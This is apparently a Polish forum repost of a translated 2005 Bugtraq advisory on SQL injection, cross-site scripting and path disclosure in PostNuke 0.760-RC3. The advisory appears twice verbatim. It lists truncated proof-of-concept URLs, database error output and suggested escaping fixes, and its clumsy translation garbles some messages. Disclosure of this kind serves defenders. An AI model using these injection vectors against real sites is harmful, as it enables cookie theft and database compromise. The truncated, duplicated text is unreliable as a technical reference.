...i kolejne tlumaczenie bugtraq'u
_____________________________________________________
Hash: SHA1
złośliwość: średnia
Tytuł: Dziurawy SQL, xss I ujawnienie dziurawych ścieżek w PostNuke 0.760-RC3
Data: 08/04/2005
Streszczenie: Bugtraq ten zawiera cała liste wszelakich dziur w POSTNUKE 0.760-rc3.
EXPLOITY:
http://adresstronylocalhost/admin.php?modu...4a7096d4471a480
Pops cookie
http://adresstronylocalhost/modules.php?op...4a7096d4471a480
ZAINFEKOWANIE SQL’a
Błąd DB: getArticles: 1064: Masz błąd w składni SQL’a. Sprawdź instrukcje która odpowiada wersji twojego servera MySQL dla poprawnej składni do użycia obok ''SQL_INJECTION' przy linii 23
http://adresstrony/modules.php?op=modload&...4a7096d4471a480
Ujawnienie poprawnej ścieżki servera
Fatalny błąd: Odwołaj sie do nie-objektywnej funkcji w /home/httpd/vhosts/localhost/httpdocs/modules/Reviews/index.php
Na linii 976
http://adresstrony/user.php?op=">&l...&module=NS-
NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
Wyświetla cookie
Możliwa naprawa: Użycie htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string()
Oraz inne funkcje dla walidacji wsadowej przed podaniem uzytkownika to bazydanych mysql, albo przed echiem danych na monitorze mogłoby naprawić ten problem
Nie zaprzestaj updateować twojej strony
-----END PGP SIGNATURE-----
_____________________________________________________
Hash: SHA1
złośliwość: średnia
Tytuł: Dziurawy SQL, xss I ujawnienie dziurawych ścieżek w PostNuke 0.760-RC3
Data: 08/04/2005
Streszczenie: Bugtraq ten zawiera cała liste wszelakich dziur w POSTNUKE 0.760-rc3.
EXPLOITY:
http://adresstronylocalhost/admin.php?modu...4a7096d4471a480
Pops cookie
http://adresstronylocalhost/modules.php?op...4a7096d4471a480
ZAINFEKOWANIE SQL’a
Błąd DB: getArticles: 1064: Masz błąd w składni SQL’a. Sprawdź instrukcje która odpowiada wersji twojego servera MySQL dla poprawnej składni do użycia obok ''SQL_INJECTION' przy linii 23
http://adresstrony/modules.php?op=modload&...4a7096d4471a480
Ujawnienie poprawnej ścieżki servera
Fatalny błąd: Odwołaj sie do nie-objektywnej funkcji w /home/httpd/vhosts/localhost/httpdocs/modules/Reviews/index.php
Na linii 976
http://adresstrony/user.php?op=">&l...&module=NS-
NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
Wyświetla cookie
Możliwa naprawa: Użycie htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string()
Oraz inne funkcje dla walidacji wsadowej przed podaniem uzytkownika to bazydanych mysql, albo przed echiem danych na monitorze mogłoby naprawić ten problem
Nie zaprzestaj updateować twojej strony
-----END PGP SIGNATURE-----